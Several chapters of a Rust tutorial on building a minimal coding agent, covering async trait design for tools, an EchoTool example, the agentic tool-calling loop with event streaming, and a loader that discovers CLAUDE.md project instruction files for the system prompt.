Note that in the MockProvider impl from Chapter 5a, we wrote async fn chat(...) directly. That works because Rust 1.75+ allows async fn in trait impls even when the trait signature uses the RPITIT form. The compiler desugars it correctly. You can do the same for Tool impls -- write async fn call(...) and the #[async_trait] macro handles the rest.
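To see why the boxed return type restores object safety, here is roughly what `#[async_trait]` expands to, written by hand with `std` only. The trait, `Upper`, and the helpers are illustrative names for this sketch, not the starter's actual API; the no-op waker exists only so we can poll the future once without a runtime:

```rust
use std::future::Future;
use std::pin::Pin;
use std::task::{Context, Poll, RawWaker, RawWakerVTable, Waker};

// The async method becomes a normal method returning a boxed future, so
// the trait has a concrete return type and Box<dyn Tool> compiles.
trait Tool {
    fn call<'a>(&'a self, input: String)
        -> Pin<Box<dyn Future<Output = String> + Send + 'a>>;
}

struct Upper;

impl Tool for Upper {
    fn call<'a>(&'a self, input: String)
        -> Pin<Box<dyn Future<Output = String> + Send + 'a>> {
        Box::pin(async move { input.to_uppercase() })
    }
}

// A no-op waker so we can poll without tokio. Demonstration only.
fn noop_waker() -> Waker {
    fn clone(_: *const ()) -> RawWaker {
        RawWaker::new(std::ptr::null(), &VTABLE)
    }
    fn noop(_: *const ()) {}
    static VTABLE: RawWakerVTable = RawWakerVTable::new(clone, noop, noop, noop);
    unsafe { Waker::from_raw(RawWaker::new(std::ptr::null(), &VTABLE)) }
}

fn call_blocking(tool: &dyn Tool, input: &str) -> String {
    let mut fut = tool.call(input.to_string());
    let waker = noop_waker();
    let mut cx = Context::from_waker(&waker);
    // This future has no await points, so it completes on the first poll.
    match fut.as_mut().poll(&mut cx) {
        Poll::Ready(out) => out,
        Poll::Pending => unreachable!("no await points: ready on first poll"),
    }
}

fn main() {
    // Heterogeneous storage is the payoff: Box<dyn Tool> is legal.
    let tools: Vec<Box<dyn Tool>> = vec![Box::new(Upper)];
    assert_eq!(call_blocking(tools[0].as_ref(), "hello"), "HELLO");
}
```

Swap the boxed return for `-> impl Future<...>` and the `Vec<Box<dyn Tool>>` line stops compiling — that is the object-safety trade-off in one diff.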
Decision rule: which pattern for your next trait?
The question to ask about any new async trait is "do I need to store values of this trait with different concrete types in the same collection?" That single question decides it:
```text
        Do you need Box<dyn MyTrait> anywhere?
                        │
         ┌──────────────┴───────────────┐
         ▼                              ▼
        yes                             no
         │                              │
         ▼                              ▼
#[async_trait::async_trait]     trait MyTrait {
trait MyTrait: Send + Sync {        fn do_it(&self)
    async fn do_it(&self)               -> impl Future<...> + Send;
        -> Result<...>;         }
}                               // callers use `impl MyTrait` or
// callers use Box<dyn MyTrait> // generic `<T: MyTrait>` params
```
Concrete cues that push you toward #[async_trait]:
- You want a `Vec<Box<dyn MyTrait>>`, `HashMap<K, Box<dyn MyTrait>>`, or similar runtime-heterogeneous container. (This is what `ToolSet` does.)
- You want to return `Box<dyn MyTrait>` from a function because callers do not need to know the concrete type.
- You want users to plug in new implementations at runtime (e.g. via a dynamic registry or plugin system).
Concrete cues that push you toward RPITIT:
- Every caller knows the concrete implementation at compile time. A struct like `SimpleAgent<P: Provider>` monomorphises once per provider.
- Throughput matters enough that you care about avoiding one boxed-future allocation per call.
- The trait has lots of `async` methods and you do not want `async_trait` to insert a `Box` around each one.
For this book, every trait we define happens to fall cleanly on one side:
`Provider` / `StreamProvider` / `SafetyCheck` are monomorphised through
generic parameters (RPITIT); `Tool` / `HookHandler` / `InputHandler` get
stored as `Box<dyn _>` in a heterogeneous collection (`#[async_trait]`).
When you add a new trait in your own extensions, walk the question above
and you will not have to think about it again.
Why tool errors never terminate the agent
A tool failure is not an agent failure. If the LLM asks to read a file that does not exist, the right behaviour is to tell it "error: file not found" and let it recover -- try a different path, ask the user, or move on. A genuine Err(...) escaping to the top of the agent loop would instead terminate the conversation, which is almost never what we want.
We get that behaviour by agreement between the Tool impl and the agent loop:
- Tools return `anyhow::Result<String>`. On failure they use `bail!("reason")` or `?`-propagation with `anyhow::Context` (`read_to_string(...).with_context(|| ...)?`). You will see `bail!` used heavily in the file tools in Chapter 9.
- The agent loop catches tool errors with `.unwrap_or_else(|e| format!("error: {e}"))` before packaging the result into a `Message::ToolResult`. The LLM always receives a string -- either the tool's success output or the formatted error.
So from inside a tool you write idiomatic Rust (?, bail!, anyhow::Context); from the LLM's side every outcome looks like a string. The only failures that do escape the agent loop are genuinely unrecoverable ones -- network failure talking to the provider, a serialization bug, a panic -- none of which a tool implementation should produce on its own.
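The convention fits in a few lines of plain `std`. `read_tool` and `tool_result` are names invented for this sketch (the real loop calls `Tool::call` and applies the same `unwrap_or_else`); the path is deliberately bogus so the error branch fires:

```rust
use std::fs;

// A fallible "tool": ordinary Result on the inside.
fn read_tool(path: &str) -> Result<String, std::io::Error> {
    fs::read_to_string(path)
}

// The agent-loop side: every outcome is flattened into a String before
// it reaches the LLM, mirroring .unwrap_or_else(|e| format!("error: {e}")).
fn tool_result(path: &str) -> String {
    read_tool(path).unwrap_or_else(|e| format!("error: {e}"))
}

fn main() {
    let out = tool_result("/definitely/not/a/real/path.txt");
    // The failure becomes data for the model, not a crash for the agent.
    assert!(out.starts_with("error: "));
    println!("{out}");
}
```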
You will see one small variation in Chapter 14: SafeToolWrapper catches its safety-check errors and returns Ok("error: safety check failed: ...") directly, rather than letting them propagate. This is equivalent (the agent loop would have formatted the Err the same way), but keeps the wrapper's error-handling self-contained when it is acting as a pre-filter.
Hands-on: building an EchoTool
Time to implement your first concrete tool. We will build a minimal EchoTool that takes a text argument and returns it unchanged. This covers the full lifecycle: defining a schema, implementing the trait, and registering with a ToolSet.
Step 1: the struct and definition
```rust
struct EchoTool {
    def: ToolDefinition,
}

impl EchoTool {
    fn new() -> Self {
        Self {
            def: ToolDefinition::new("echo", "Echo the input")
                .param("text", "string", "Text to echo", true),
        }
    }
}
```
The ToolDefinition is built once in the constructor and stored as a field. The schema tells the LLM: "this tool is called echo, it takes a required string parameter called text."
Step 2: implement the Tool trait
```rust
#[async_trait::async_trait]
impl Tool for EchoTool {
    fn definition(&self) -> &ToolDefinition {
        &self.def
    }

    async fn call(&self, args: Value) -> anyhow::Result<String> {
        let text = args["text"].as_str().unwrap_or("(no text)");
        Ok(text.to_string())
    }
}
```
A few things to note:
- `definition()` returns a reference to the stored `ToolDefinition`.
- `call()` indexes into the JSON `args` to extract `text`. If the key is missing or not a string, we fall back to `"(no text)"` rather than panicking. Always be defensive with LLM-provided arguments.
- `call()` returns `anyhow::Result<String>` -- just a plain string, not a `ToolResult` struct. The starter keeps tool output simple.
- There are only two required methods. No safety flags, no validation, no summary -- the starter's `Tool` trait is minimal.
Step 3: register and use
```rust
let tools = ToolSet::new().with(EchoTool::new());

// The agent loop would do this:
let defs = tools.definitions();
// ... send defs to LLM, get back a ToolCall ...
let tool = tools.get("echo").unwrap();
let result = tool.call(serde_json::json!({"text": "hello"})).await?;
assert_eq!(result, "hello");
```
That is the full round-trip. Definition goes to the LLM, the LLM produces a ToolCall, we look up the tool by name, call it, and feed the result back.
The minimal trait
The starter's Tool trait has exactly two required methods:
| Method | Purpose |
|---|---|
| `definition()` | Return the tool's JSON Schema description |
| `call()` | Execute the tool and return a string result |
There are no default methods, no safety flags, no validation hooks. This is intentional -- the starter keeps things simple so you can focus on the agent loop mechanics. Claude Code's real tool system adds is_read_only(), is_destructive(), validate_input(), and more, but those are not needed to build a working agent.
How this compares to Claude Code
Claude Code's tool system is substantially larger:
- 40+ tools spanning file operations, git, search, browser, notebook, MCP, and more. We build 5.
- Zod schemas provide runtime validation with TypeScript type inference. We use `serde_json::Value` with a builder.
- React rendering -- tools can return React elements that render rich terminal UI (diffs, tables, progress bars). We return plain strings.
- Progress events -- tools emit typed progress events during execution. We have `activity_description()` for a simple spinner.
- Tool groups and permissions -- tools are organized into permission groups with allow/deny lists. We will build our permission system in Chapter 13, but it will be simpler.
- Cost hints -- tools can declare estimated token costs to help the context manager. Our `TokenUsage` type from Chapter 4 tracks tokens at the message level, but we do not carry cost hints on individual tools.
Despite these differences, the core protocol is identical. An LLM sees a list of tool schemas, decides to call one, the agent executes it, and the result goes back to the LLM. Everything else -- validation, permissions, progress, rendering -- is orchestration around that loop. Understanding the Tool trait gives you the foundation to understand Claude Code's full system.
Implementation note
There is no new source file to create in this chapter. The EchoTool exists
only in the test file (src/tests/ch3.rs). Your job is to verify that the types
you built in Chapter 4 -- Tool, ToolDefinition, ToolSet --
work correctly with a concrete tool implementation. If the test_read_ tests pass,
your type definitions are correct.
Run the tests
cargo test -p mini-claw-code-starter test_read_
What the tests verify
- `test_read_read_definition` -- the `ReadTool` produces the correct name and a non-empty description from its `ToolDefinition`, and the `"path"` parameter is required
- `test_read_read_file` -- calling with a valid path returns the file's content, verifying argument extraction and return value
- `test_read_read_missing_file` -- calling with a nonexistent path returns an error
- `test_read_read_missing_arg` -- calling with no arguments returns an error
Key takeaway
The Tool trait is deliberately minimal -- just definition() and call(). This simplicity means every tool, from a trivial echo to a complex bash executor, implements the same two-method interface. The agent loop does not need to know what a tool does; it only needs to look it up by name and call it.
Summary
This chapter focused on the why behind the tool types you defined in Chapter 4:
- `#[async_trait]` vs RPITIT -- the critical distinction. Tools need object safety for heterogeneous storage; providers need zero-cost generics. The two-strategy approach gives you both.
- Errors are values -- tool failures return `Ok("error: ...")`, not `Err(...)`. The agent loop continues. The model adapts.
- `EchoTool` -- your first concrete tool, demonstrating the full lifecycle: schema definition, trait implementation, registration, execution.
In the next chapter we build the SimpleAgent -- the loop that ties providers and tools together into a functioning agent.
Check yourself
← Chapter 5b: OpenRouter & StreamingAgent · Contents · Chapter 7: The Agentic Loop (Deep Dive) →
Chapter 7: The Agentic Loop (Deep Dive)
File(s) to edit:
`src/agent.rs` — only the `run_with_history` stub is new in this chapter. `single_turn`, `execute_tools`, and `chat` were implemented back in Chapter 3; this chapter is a deep-dive walkthrough of the loop you already built, plus a thin new event-emitting variant. Tests to run: the same Chapter 3 tests still apply (`cargo test -p mini-claw-code-starter test_single_turn_`, `cargo test -p mini-claw-code-starter test_simple_agent_`); there is no dedicated test in the starter for `run_with_history` — verify it manually by running the example in Chapter 5b and watching the event stream. Estimated time: 45 min
Goal
- Revisit `SimpleAgent::chat` from Chapter 3 with a careful walk-through of the control flow, the message ordering, and the edge cases. You are not reimplementing it -- you are understanding what you already wrote.
- Revisit `execute_tools` and make sure you know why tool errors become result strings rather than propagating -- the rationale links back to the agreement explained in Chapter 6.
- Implement the one new piece: `run_with_history`, an event-emitting variant of the main loop that sends an `AgentEvent` after every turn so a UI layer (built in later chapters) can observe progress.
- Understand message ordering: why `Message::Assistant` must be pushed before the matching `Message::ToolResult` values.
This is the chapter where everything clicks.
In the previous chapters you built the vocabulary (messages), the mouth (provider), and the hands (tools). Now you build the brain -- the loop that ties them all together. The SimpleAgent is the heart of a coding agent. It is the thing that takes a user prompt, talks to an LLM, executes tools, feeds results back, and keeps going until the job is done.
Every coding agent -- Claude Code, Cursor, Aider, OpenCode -- has some version of this loop. The details vary (streaming, permissions, compaction), but the skeleton is identical. Get this right and you have a working agent. Everything else in this book is refinement.
What the SimpleAgent does
Here is the entire agent lifecycle in one sentence: prompt the LLM, check if it wants to use tools, execute those tools, send the results back, repeat until the LLM says it is done.
That is it. The SimpleAgent implements this loop. In the starter it owns just two things:
- A provider -- the LLM backend (from Chapter 5a / 5b)
- A tool set -- the registered tools (from Chapter 6)

A production agent would also carry a config -- safety limits and behavior knobs -- but as the struct below shows, the starter leaves that out.
flowchart TD
A[User prompt] --> B[SimpleAgent::chat]
B --> C[Provider.chat]
C --> D{StopReason?}
D -->|Stop| E[Return final text]
D -->|ToolUse| F[execute_tools]
F --> G[Push Message::Assistant]
G --> H[Push Message::ToolResult for each result]
H --> C
If you have read Claude Code's source, this maps to the query engine and the query function. Our version strips away streaming, permissions, hooks, and compaction -- those come in later chapters -- leaving the pure control flow.
The SimpleAgent struct
The starter's SimpleAgent is leaner than a production engine -- no config struct, no max turns, no truncation. Just a provider and tools:
```rust
pub struct SimpleAgent<P: Provider> {
    provider: P,
    tools: ToolSet,
}
```
Generic over P: Provider, so the same agent works with OpenRouterProvider in production and MockProvider in tests. The builder pattern lets you configure it fluently:
```rust
let agent = SimpleAgent::new(provider)
    .tool(BashTool::new())
    .tool(ReadTool::new())
    .tool(WriteTool::new());
```
No surprises. The interesting part is the methods that actually run.
execute_tools: the tool dispatch helper
Before tackling the main loop, we need a helper that takes a slice of ToolCalls from the LLM and produces results. This is execute_tools:
```rust
async fn execute_tools(&self, calls: &[ToolCall]) -> Vec<(String, String)> {
    let mut results = Vec::with_capacity(calls.len());
    for call in calls {
        let result = match self.tools.get(&call.name) {
            Some(t) => t
                .call(call.arguments.clone())
                .await
                .unwrap_or_else(|e| format!("error: {e}")),
            None => format!("error: unknown tool `{}`", call.name),
        };
        results.push((call.id.clone(), result));
    }
    results
}
```
Two stages:
- Tool lookup -- If the LLM hallucinates a tool name that does not exist, we return an error string. The model sees ``"error: unknown tool `foo`"`` and can recover. This happens more than you might expect, especially with smaller models.
- Execute -- Run the tool. If it fails, `.unwrap_or_else(|e| format!("error: {e}"))` converts the error to a string the model can read.
Note the return type: Vec<(String, String)> -- pairs of (call ID, result string). No ToolResult struct, no truncation, no validation. The starter keeps this simple.
This is a key design decision: tool errors become results, not panics. The agent loop never crashes because a tool failed. The model reads the error, adjusts its approach, and tries again.
The chat() method: the core loop
This is it. The agentic loop. Read it carefully -- it is shorter than you expect.
```rust
pub async fn chat(&self, messages: &mut Vec<Message>) -> anyhow::Result<String> {
    let defs = self.tools.definitions();
    loop {
        let turn = self.provider.chat(messages, &defs).await?;
        match turn.stop_reason {
            StopReason::Stop => {
                let text = turn.text.clone().unwrap_or_default();
                messages.push(Message::Assistant(turn));
                return Ok(text);
            }
            StopReason::ToolUse => {
                let results = self.execute_tools(&turn.tool_calls).await;
                messages.push(Message::Assistant(turn));
                for (id, content) in results {
                    messages.push(Message::ToolResult { id, content });
                }
            }
        }
    }
}
```
Let's break it down.
Tool definitions: collected once
```rust
let defs = self.tools.definitions();
```
We gather tool definitions outside the loop. They do not change between iterations -- the tool set is fixed for the lifetime of the agent. Every call to provider.chat() includes these definitions so the LLM knows which tools are available.
Call the provider
```rust
let turn = self.provider.chat(messages, &defs).await?;
```
Send the full message history and tool definitions to the LLM. The ? propagates provider errors (network failure, auth error, rate limit) directly to the caller. Provider errors are not recoverable by the agent loop -- they need human intervention.
Match the stop reason
```rust
match turn.stop_reason {
    StopReason::Stop => { /* final answer */ }
    StopReason::ToolUse => { /* tool dispatch */ }
}
```
The LLM tells us why it stopped generating. Two possibilities:
- `Stop` -- The model is done. It has a final text answer. Extract it, push the assistant message into history, return.
- `ToolUse` -- The model wants to use tools. It has populated `tool_calls` with one or more calls. Execute them, push results, loop.
The two branches
StopReason::Stop -- Clone the text, push the assistant message into history, return. The conversation ends with an Assistant message, ready for the next user turn.
StopReason::ToolUse -- Execute the tools, then push messages in this exact order:
- First, `Message::Assistant(turn)` -- the assistant's response including its tool calls
- Then, `Message::ToolResult { id, content }` for each tool result
This ordering matters. The LLM API expects tool results to follow the assistant message that requested them. Each ToolResult is linked to its ToolCall by the id field. If you push them in the wrong order, the provider will reject the request.
After pushing results, the loop continues. The next iteration sends the entire history -- including the tool calls and their results -- back to the LLM. The model sees what happened and decides what to do next.
Rust concept: ownership and &mut Vec<Message>
The caller owns the message history and passes it as &mut Vec<Message>. This is a deliberate Rust ownership decision -- the agent borrows the history mutably for the duration of the call, but ownership stays with the caller. The alternative would be for the agent to own the Vec, but then the caller could not inspect the history after the call, and multi-turn conversations would require moving the Vec in and out of the agent. &mut is the cleanest solution: the agent pushes messages into the caller's vec, and the caller retains full control afterward.
Keeping ownership with the caller enables three things:
- Multi-turn conversations -- The caller can push a new `Message::User(...)` and call `chat()` again. The agent picks up where it left off with the full context.
- Inspection -- After `chat()` returns, the caller can examine the full message history to see every tool call, every result, every intermediate step.
- Persistence -- The caller can serialize the messages to disk for session save/resume.
run(): the convenience wrapper
Most of the time you just want to send a prompt and get a response. That is run():
```rust
pub async fn run(&self, prompt: &str) -> anyhow::Result<String> {
    let mut messages = vec![Message::User(prompt.to_string())];
    self.chat(&mut messages).await
}
```
Two lines. Creates a fresh message history with the user prompt, delegates to chat(). The message history is discarded after the call -- use chat() directly if you need to preserve it.
AgentEvent: making it observable
The chat() method returns when the agent is done. That is fine for tests, but a real UI needs to show progress while the loop is running. What tool is being called? How long has it been running? Is it done?
The AgentEvent enum models these updates:
```rust
#[derive(Debug)]
pub enum AgentEvent {
    /// A chunk of text streamed from the LLM (streaming mode only).
    TextDelta(String),
    /// A tool is being called.
    ToolCall { name: String, summary: String },
    /// The agent finished with a final response.
    Done(String),
    /// The agent encountered an error.
    Error(String),
}
```
Four variants covering the lifecycle:
| Event | When | UI use |
|---|---|---|
| `TextDelta` | LLM streams a text chunk | Append to terminal output |
| `ToolCall` | A tool is being called | Show "[bash: ls -la]" |
| `Done` | Agent loop finished | Display final answer |
| `Error` | Unrecoverable error | Show error message |
Note: the starter combines ToolStart/ToolEnd into a single ToolCall event. The summary field is generated by the tool_summary() helper in src/agent.rs, which looks for common argument keys (command, path, question) and formats them like [bash: ls -la].
run_with_events / run_with_history
These methods duplicate the core loop logic but emit events through a tokio::sync::mpsc::UnboundedSender<AgentEvent> channel. The caller creates the channel, passes the sender, and consumes events from the receiver -- typically in a separate task that drives the UI.
```rust
pub async fn run_with_events(
    &self,
    prompt: &str,
    events: mpsc::UnboundedSender<AgentEvent>,
) {
    let messages = vec![Message::User(prompt.to_string())];
    self.run_with_history(messages, events).await;
}
```
run_with_history has the same structure as chat() but with events woven in. It takes ownership of the messages vec and returns the full history. Errors are sent as AgentEvent::Error rather than propagated.
The key differences from chat():
- Provider errors are caught with `match` instead of `?`, and sent as `AgentEvent::Error`.
- `ToolCall` events fire for each tool call, using the `tool_summary()` helper to produce a one-line description.
- `Done` event fires before pushing the final assistant message, so the UI gets the text immediately.
Note the let _ = events.send(...) pattern. The send can fail if the receiver has been dropped (the UI task crashed or exited early). We ignore the error because the agent should finish its work regardless of whether anyone is watching.
Using events in practice
The caller creates an unbounded channel, passes the sender to the agent, and reads events from the receiver -- typically in a separate task:
```rust
let (tx, mut rx) = tokio::sync::mpsc::unbounded_channel();

let agent_handle = tokio::spawn(async move {
    agent.run_with_events("Fix the bug in main.rs", tx).await
});

while let Some(event) = rx.recv().await {
    match event {
        AgentEvent::ToolCall { summary, .. } => println!("{summary}"),
        AgentEvent::Done(text) => {
            println!("{text}");
            break;
        }
        AgentEvent::Error(e) => {
            eprintln!("Error: {e}");
            break;
        }
        _ => {}
    }
}
```
This two-task pattern is what a TUI builds on. The UI task renders events; the agent task runs the loop. They communicate through the channel.
Error handling philosophy
The agent has two distinct error strategies, and the boundary between them is intentional.
Tool errors become results
When a tool fails -- execution error, unknown tool -- the error becomes a string result that the model sees as a normal tool result. The loop continues. The model reads the error and adapts.
Tool error flow:
LLM requests bash("some_command")
-> Tool returns Err(e)
-> unwrap_or_else converts to "error: {e}"
-> Pushed as Message::ToolResult { id, content: "error: ..." }
-> LLM sees error, tries different approach
This is essential for robust agents. Models make mistakes. Tools fail for legitimate reasons. The agent should recover, not crash.
Provider errors propagate
When the provider fails -- network timeout, authentication error, rate limit, malformed response -- the error propagates up via ? (in chat()) or via AgentEvent::Error (in run_with_history()). The loop stops.
Provider error flow:
Agent calls provider.chat()
-> Provider returns Err(network timeout)
-> chat() returns Err(network timeout)
-> Caller handles it (retry, show error, etc.)
Provider errors are not the agent's problem. They need human or system-level intervention (check your API key, wait for rate limits, fix your network). The agent does not try to recover.
Message history management
The order in which messages are pushed into the history is load-bearing. After a tool-use turn:
```rust
StopReason::ToolUse => {
    let results = self.execute_tools(&turn.tool_calls).await;
    messages.push(Message::Assistant(turn)); // 1. Assistant message (with tool_calls)
    for (id, content) in results {
        messages.push(Message::ToolResult { id, content }); // 2. Tool results
    }
}
```
The resulting message sequence looks like:
[User] "What files are in src/?"
[Assistant] tool_calls: [bash("ls src/")] <- includes the tool call
[ToolResult] "main.rs\nlib.rs\n" <- linked by call ID
[Assistant] "There are two files: ..." <- next LLM response
Why this order?
- API requirement: The Claude API (and OpenAI-compatible APIs) require that `tool_result` messages immediately follow the `assistant` message that generated the corresponding `tool_use`. Violating this causes a 400 error.
- ID linking: Each `Message::ToolResult` has an `id` that matches a `ToolCall.id` in the preceding assistant message. The LLM uses this to associate results with requests when there are multiple parallel tool calls.
- Context for the next turn: The LLM needs to see its own tool calls to understand what it asked for, and the results to know what happened. Both must be present in the history for the next `provider.chat()` call.
Putting it all together: a complete trace
Let's trace through a realistic scenario. The user asks: "What is 2 + 3?"
The agent has an AddTool registered. The mock provider is configured to return a tool call first, then a final answer.
Turn 0:
messages: [User("What is 2 + 3?")]
-> provider.chat() returns: ToolUse, tool_calls: [add(a=2, b=3)]
-> execute_tools: AddTool.call({a:2, b:3}) -> Ok("5")
-> push: Assistant(tool_calls: [add(a=2, b=3)])
-> push: ToolResult { id: "call_1", content: "5" }
Turn 1:
messages: [User, Assistant, ToolResult]
-> provider.chat() returns: Stop, text: "The sum is 5"
-> push: Assistant(text: "The sum is 5")
-> return Ok("The sum is 5")
Two provider calls, one tool execution, clean exit. The final message history has 4 entries: User, Assistant (with tool call), ToolResult, Assistant (with text).
How this compares to Claude Code
Our SimpleAgent is a teaching implementation. Claude Code's real agent is considerably more complex. Here is what it adds:
| Feature | Our agent | Claude Code |
|---|---|---|
| Core loop | loop { match stop_reason } | Same pattern, but with async hooks at every stage |
| Streaming | Separate run_with_events | Integrated SSE streaming with StreamProvider |
| Permissions | None | Full permission pipeline checked before every tool call |
| Max turns | None | Configurable ceiling on loop iterations |
| Truncation | None | Tool result size limits |
| Compaction | None | Auto-compacts when approaching token limit |
| Hooks | None | Pre/post tool hooks with shell command execution |
| Concurrency | Sequential tool execution | Parallel execution for safe tools |
| Error recovery | Tool errors as results | Same, plus retry logic for transient provider errors |
The good news: the architecture is the same. Every feature in the right column plugs into the same loop structure. Permissions are checked in execute_tools before calling t.call(). Compaction runs at the top of the loop when token count is high. Hooks fire around tool execution.
Tests
Run the tests to verify your implementation:
cargo test -p mini-claw-code-starter test_single_turn_ # single_turn tests
cargo test -p mini-claw-code-starter test_simple_agent_ # SimpleAgent tests
What the tests verify
Single-turn tests (test_single_turn_):
- `test_single_turn_direct_response` -- provider returns text with `StopReason::Stop`; verifies the agent returns that text directly
- `test_single_turn_one_tool_call` -- provider returns a tool call then a final answer; verifies the agent executes the tool and returns the final text
- `test_single_turn_unknown_tool` -- provider requests a tool that is not registered; verifies the agent returns an error string (not a panic) and the loop continues
SimpleAgent tests (test_simple_agent_):
- `test_simple_agent_text_response` -- `run()` with a provider that returns text; verifies the response string
- `test_simple_agent_single_tool_call` -- provider scripts a tool call followed by a final answer; verifies the agent loops correctly and returns the final text
- `test_simple_agent_unknown_tool` -- provider requests a tool that is not registered; verifies the agent returns an error string (not a panic) and the loop continues
- `test_simple_agent_multi_step_loop` -- provider scripts two tool calls then a final answer; verifies the agent loops correctly through multiple tool rounds
Implementation checklist
Open src/agent.rs in the starter. You will see unimplemented!() stubs with doc comments for each method. Here is what to fill in:
- `SimpleAgent::new` -- Initialize with the provider and an empty `ToolSet`.
- `SimpleAgent::tool` -- Push the tool into `self.tools`, return `self`.
- `execute_tools` -- Look up each tool, execute, catch errors. Return `Vec<(String, String)>`.
- `chat` -- The core loop. Call provider, match stop reason, dispatch tools, push messages, loop.
- `run` -- Create messages with `Message::User(prompt)`, delegate to `chat`.
- `run_with_history` -- Same loop as `chat` but emit `AgentEvent`s through a channel. Handle errors as events instead of `?`.
- `run_with_events` -- Create messages, delegate to `run_with_history`.
Start with new and tool. Then implement execute_tools -- you can test it implicitly through run. Then chat, then run. Save the event methods for last.
Key takeaway
The agentic loop is surprisingly small -- a loop, a match on StopReason, and a helper that dispatches tool calls. Every feature a production agent adds (permissions, streaming, compaction, hooks) plugs into this same skeleton. If you understand chat(), you understand the architecture of every coding agent.
What you have now
After this chapter, you have a working coding agent. Not a complete one -- it has no real tools yet (those come in later chapters) -- but the core loop is done. You can register any tool that implements the Tool trait, point it at any provider that implements Provider, and the agent will autonomously loop until it has an answer.
This is the skeleton that everything else hangs on. Every feature you add later -- real tools like Bash and Read, permissions, streaming -- plugs into the loop you just built.
Check yourself
← Chapter 6: Tool Interface · Contents · Chapter 8: System Prompt →
Chapter 8: System Prompt
File(s) to edit:
`src/instructions.rs` Test to run: `cargo test -p mini-claw-code-starter instructions` (`InstructionLoader`) Estimated time: 25 min
Every LLM-based agent starts with a system prompt -- an invisible preamble that shapes every response the model produces. A sloppy prompt gives you a chatbot. A carefully engineered prompt gives you a coding agent that follows safety rules, uses tools correctly, and adapts to the project it is working in.
Claude Code's system prompt is over 900 lines of assembled text. It is not written as a single string. It is built from modular sections -- identity, safety rules, tool schemas, environment info, project instructions -- stitched together by a builder at startup. Some sections never change between sessions (tool schemas, core instructions). Others change every time (working directory, git status, CLAUDE.md contents). This distinction is not cosmetic. It is the foundation of prompt caching, an optimization that can cut costs and latency dramatically.
In this chapter you will build the InstructionLoader -- the component that
discovers project-specific CLAUDE.md files by walking up the filesystem. We will
also discuss system prompt architecture concepts (sections, static/dynamic
splitting, prompt caching) that production agents like Claude Code use. Our
starter focuses on the instruction loading piece, which is the most practically
useful part.
Goal
Implement InstructionLoader in src/instructions.rs so that:
- `InstructionLoader` walks up the filesystem to discover and load CLAUDE.md files.
- `load()` concatenates discovered files into a single string with headers.
- `system_prompt_section()` wraps the loaded instructions for inclusion in a system prompt.
How instruction loading works
flowchart TD
A[InstructionLoader::discover] -->|walks upward| B["/home/user/CLAUDE.md"]
A -->|walks upward| C["/home/user/project/CLAUDE.md"]
A -->|starts here| D["/home/user/project/backend/CLAUDE.md"]
B --> E[Reverse to root-first order]
C --> E
D --> E
E --> F[InstructionLoader::load]
F -->|concatenates with headers| G[Combined instructions string]
G --> H[system_prompt_section]
H --> I[Ready for system prompt]
Why system prompts matter for agents
A vanilla LLM is a text completer. It has no idea it can run bash commands, read files, or edit code -- unless you tell it. The system prompt is where you tell it.
For a coding agent, the system prompt must do several things:
- Identity: "You are a coding agent with access to tools." Without this, the model may refuse tool calls or behave like a generic assistant.
- Safety: "Do not delete files outside the working directory. Do not introduce security vulnerabilities." Safety rules constrain what the model will attempt.
- Tool schemas: The JSON schema definitions for every available tool. The model needs these to know how to call tools -- what parameters they accept, which are required, what types they expect.
- Environment: The working directory, OS, shell, git status. This context prevents the model from guessing about the environment.
- Project instructions: Contents of CLAUDE.md files that tell the model about project conventions, preferred patterns, and things to avoid.
Claude Code assembles all of these into a single system prompt before each conversation. Sections are ordered deliberately, and a cache boundary separates the parts that change from the parts that do not.
Concepts: sections and cache boundaries
Before diving into the code, let's understand how production agents like Claude Code structure their system prompts. These concepts inform the design even though our starter takes a simpler approach.
Prompt sections
A production system prompt is built from modular sections -- identity, safety rules, tool schemas, environment info, project instructions. Each section is a named chunk of text that renders as:
# identity
You are a coding agent. You help users with software engineering tasks
using the tools available to you.
The heading helps the LLM parse the prompt structure and makes debugging easier when you inspect the assembled prompt.
Static vs. dynamic: the cache boundary
LLM API calls are expensive. Every token in the system prompt is processed on every request. Claude's prompt caching feature lets you mark a prefix of the prompt as cacheable -- the API processes it once, caches the internal state, and reuses it on subsequent requests. This can reduce latency by up to 85% and cost by up to 90% for long prompts.
But caching only works for a prefix. If any byte in the cached prefix changes, the cache is invalidated. This means you need to put the stable parts first and the changing parts last:
+---------------------------------------+
| Static sections (cacheable) |
| - Identity |
| - Safety instructions |
| - Tool schemas |
| |
| [these rarely change] |
+-------- CACHE BOUNDARY ---------------+
| Dynamic sections (per-session) |
| - Working directory |
| - Git status |
| - CLAUDE.md instructions |
| - Custom user instructions |
| |
| [these change every session] |
+---------------------------------------+
Claude Code calls this boundary SYSTEM_PROMPT_DYNAMIC_BOUNDARY. Everything
above it is sent with a cache control header. Everything below it is fresh on
each request.
A production agent would implement a SystemPromptBuilder that maintains
separate lists of static and dynamic sections, renders each half independently,
and supports cache-aware providers. These types (SystemPromptBuilder,
PromptSection) are conceptual in this chapter -- the starter does not include
them. Instead, the starter implements InstructionLoader in
src/instructions.rs, which is the most practically useful component to build
from scratch.
InstructionLoader: discovering CLAUDE.md
Claude Code loads project-specific instructions from CLAUDE.md files. These files let users customize the agent's behavior per project -- preferred coding style, test commands, things to avoid. The agent discovers them by walking up the filesystem from the current working directory.
Open src/instructions.rs. Here is the starter stub:
```rust
pub struct InstructionLoader {
    file_names: Vec<String>,
}

impl InstructionLoader {
    pub fn new(file_names: &[&str]) -> Self {
        unimplemented!("Convert file_names to Vec<String>")
    }

    pub fn default_files() -> Self {
        Self::new(&["CLAUDE.md", ".mini-claw/instructions.md"])
    }

    pub fn discover(&self, start_dir: &Path) -> Vec<PathBuf> {
        unimplemented!(
            "Walk up from start_dir, collect matching files, reverse for root-first order"
        )
    }

    pub fn load(&self, start_dir: &Path) -> Option<String> {
        unimplemented!("Discover files, read each, join with headers showing source path")
    }

    pub fn system_prompt_section(&self, start_dir: &Path) -> Option<String> {
        unimplemented!("Call load(), wrap with instruction preamble")
    }
}
```
The loader is parameterized by file names to search for. The default
configuration looks for CLAUDE.md and .mini-claw/instructions.md.
Rust concept: borrowed slices to owned collections
The constructor takes &[&str] -- a borrowed slice of borrowed string slices -- and converts it to Vec<String>. This is a common Rust pattern at API boundaries: accept borrowed data for flexibility (the caller can pass string literals, &String, or anything that derefs to &str), but store owned data internally so the struct has no lifetime parameter and can live independently of its creator.
Implementing new()
The constructor converts the &[&str] slice into owned String values:
```rust
pub fn new(file_names: &[&str]) -> Self {
    Self {
        file_names: file_names.iter().map(|s| s.to_string()).collect(),
    }
}
```
